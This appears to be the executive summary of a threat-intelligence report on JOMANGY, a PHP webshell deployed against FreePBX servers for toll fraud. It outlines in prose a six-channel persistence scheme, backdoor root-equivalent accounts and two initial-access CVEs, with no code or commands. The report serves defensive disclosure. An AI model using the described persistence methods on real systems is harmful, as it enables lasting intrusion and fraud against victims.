Cyble Research & Intelligence Labs has uncovered JOMANGY, a previously undocumented PHP webshell family deployed in an active FreePBX exploitation campaign attributed with high confidence to threat actor INJ3CTOR3. The campaign uses a multi-stage Bash dropper to install JOMANGY alongside the previously known ZenharR webshell, with every instance carrying live VoIP toll fraud code that routes calls through victims' own SIP trunks. What distinguishes this generation is a six-channel persistence architecture where each channel can rebuild all others: cron-based C2 polling every 1-3 minutes, shell profile injection, eight chattr +i-immutable crontab backups with dual restore loops, a process watchdog, immutable webshell copies, and a self-reinstalling PHP executor via FreePBX HA hooks. The infection also drops 18 backdoor accounts including nine UID-0 root-equivalent accounts. The campaign targets a C2-hosted inventory of 3,080 IP addresses, with ~39% pointing to Alibaba Cloud infrastructure. Two CVEs are identified as high-confidence initial access candidates: CVE-2025-64328 (post-auth command injection) and CVE-2025-57819 (pre-auth SQL injection). The operator actively evicts competitor webshells and their own prior-campaign artifacts, reflecting a deliberate botnet migration from Brazilian to Dutch infrastructure. Over 700 hosts remained compromised five months after public CVE disclosure, underscoring that patching alone does not equal remediation on already-owned systems.
Table of contents
Executive SummaryKey TakeawaysAttributionVictimology and Target ProfileBackgroundTechnical AnalysisConclusionSort: